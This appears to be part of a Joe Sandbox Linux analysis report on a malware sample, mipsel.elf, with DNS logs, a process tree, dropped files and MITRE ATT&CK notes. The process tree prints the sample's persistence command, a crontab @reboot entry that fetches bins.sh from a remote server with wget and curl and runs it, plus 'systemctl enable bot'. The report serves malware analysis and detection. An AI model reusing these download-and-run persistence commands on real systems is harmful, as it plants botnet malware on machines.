Nov 20, 2024 00:58:05.337475061 CET	45962	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:10.102507114 CET	58323	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:10.344284058 CET	55821	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:15.350584030 CET	38314	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:25.602057934 CET	53166	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:30.851918936 CET	48667	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:58:40.356251955 CET	44860	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:45.362133026 CET	37577	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:50.364598036 CET	37952	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:55.369680882 CET	38063	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:59:00.372886896 CET	41404	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:59:00.486759901 CET	53	41404	1.1.1.1	192.168.2.15

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 00:57:10.281671047 CET	192.168.2.15	1.1.1.1	0xa863	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:57:13.105171919 CET	192.168.2.15	1.1.1.1	0x697c	Standard query (0)	motd.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:14.814310074 CET	192.168.2.15	1.1.1.1	0xe5dd	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:14.814310074 CET	192.168.2.15	1.1.1.1	0x1f3f	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:57:15.291449070 CET	192.168.2.15	1.1.1.1	0xa863	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:57:19.818146944 CET	192.168.2.15	1.1.1.1	0xe5dd	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:20.294725895 CET	192.168.2.15	1.1.1.1	0xa863	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:57:24.853466034 CET	192.168.2.15	1.1.1.1	0xe5dd	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:25.318486929 CET	192.168.2.15	1.1.1.1	0xa863	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:57:28.603434086 CET	192.168.2.15	8.8.8.8	0x697c	Standard query (0)	motd.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:30.103337049 CET	192.168.2.15	1.1.1.1	0xe5dd	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:30.322328091 CET	192.168.2.15	1.1.1.1	0xa863	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:57:33.853220940 CET	192.168.2.15	8.8.8.8	0x697c	Standard query (0)	motd.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:35.353162050 CET	192.168.2.15	1.1.1.1	0xe5dd	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:39.103084087 CET	192.168.2.15	8.8.8.8	0x697c	Standard query (0)	motd.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:40.603032112 CET	192.168.2.15	1.1.1.1	0xe5dd	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:45.852890968 CET	192.168.2.15	1.1.1.1	0xe5dd	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:54.602704048 CET	192.168.2.15	1.1.1.1	0x697c	Standard query (0)	motd.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:57:55.329466105 CET	192.168.2.15	1.1.1.1	0x8144	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:58:00.333939075 CET	192.168.2.15	1.1.1.1	0x8144	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:58:05.337475061 CET	192.168.2.15	1.1.1.1	0x8144	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:58:10.102507114 CET	192.168.2.15	1.1.1.1	0x697c	Standard query (0)	motd.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:58:10.344284058 CET	192.168.2.15	1.1.1.1	0x8144	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:58:15.350584030 CET	192.168.2.15	1.1.1.1	0x8144	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:58:25.602057934 CET	192.168.2.15	1.1.1.1	0x697c	Standard query (0)	motd.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:58:30.851918936 CET	192.168.2.15	8.8.8.8	0x697c	Standard query (0)	motd.ubuntu.com	28	IN (0x0001)	false
Nov 20, 2024 00:58:40.356251955 CET	192.168.2.15	1.1.1.1	0x54ba	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:58:45.362133026 CET	192.168.2.15	1.1.1.1	0x54ba	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:58:50.364598036 CET	192.168.2.15	1.1.1.1	0x54ba	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:58:55.369680882 CET	192.168.2.15	1.1.1.1	0x54ba	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 00:59:00.372886896 CET	192.168.2.15	1.1.1.1	0x54ba	Standard query (0)	host.zopz-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 00:59:00.486759901 CET	1.1.1.1	192.168.2.15	0x54ba	No error (0)	host.zopz-api.com		172.111.38.48	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: mipsel.elf PID: 5528, Parent PID: 5447

General

Start time (UTC):	23:57:05
Start date (UTC):	19/11/2024
Path:	/tmp/mipsel.elf
Arguments:	/tmp/mipsel.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mipsel.elf PID: 5530, Parent PID: 5528

General

Start time (UTC):	23:57:06
Start date (UTC):	19/11/2024
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mipsel.elf PID: 5532, Parent PID: 5530

General

Start time (UTC):	23:57:06
Start date (UTC):	19/11/2024
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mipsel.elf PID: 5534, Parent PID: 5530

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mipsel.elf PID: 5537, Parent PID: 5530

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mipsel.elf PID: 5540, Parent PID: 5530

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: sh PID: 5540, Parent PID: 5530

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5542, Parent PID: 5540

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5544, Parent PID: 5542

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5544, Parent PID: 5542

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5545, Parent PID: 5542

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 5545, Parent PID: 5542

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x bins.sh
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: sh PID: 5546, Parent PID: 5542

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5546, Parent PID: 5542

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/usr/bin/sh
Arguments:	sh bins.sh
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5547, Parent PID: 5542

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: curl PID: 5547, Parent PID: 5542

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/bin/curl
Arguments:	/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
File size:	239848 bytes
MD5 hash:	add6bc2195e82c55985ccf49fd4048e6

Chronological Activities

Analysis Process: sh PID: 5550, Parent PID: 5542

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 5550, Parent PID: 5542

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x bins.sh
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: sh PID: 5542, Parent PID: 5540

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/usr/bin/sh
Arguments:	sh bins.sh
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5543, Parent PID: 5540

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5543, Parent PID: 5540

General

Start time (UTC):	23:57:09
Start date (UTC):	19/11/2024
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: mipsel.elf PID: 5551, Parent PID: 5530

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: sh PID: 5551, Parent PID: 5530

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	sh -c "/bin/systemctl enable bot"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5557, Parent PID: 5551

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5557, Parent PID: 5551

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/bin/systemctl
Arguments:	/bin/systemctl enable bot
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5559, Parent PID: 5558

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5559, Parent PID: 5558

General

Start time (UTC):	23:57:11
Start date (UTC):	19/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mipsel.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/memfd:snapd-env-generator (deleted)

/root/.bashrc

/usr/lib/systemd/system/bot.service

/var/spool/cron/crontabs/tmp.kyAZ7l

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: mipsel.elf PID: 5528, Parent PID: 5447

General

Chronological Activities

Analysis Process: mipsel.elf PID: 5530, Parent PID: 5528

General

Chronological Activities

Analysis Process: mipsel.elf PID: 5532, Parent PID: 5530

General

Chronological Activities

Analysis Process: mipsel.elf PID: 5534, Parent PID: 5530

General

Chronological Activities

Analysis Process: mipsel.elf PID: 5537, Parent PID: 5530

General

Chronological Activities

Linux Analysis Report
mipsel.elf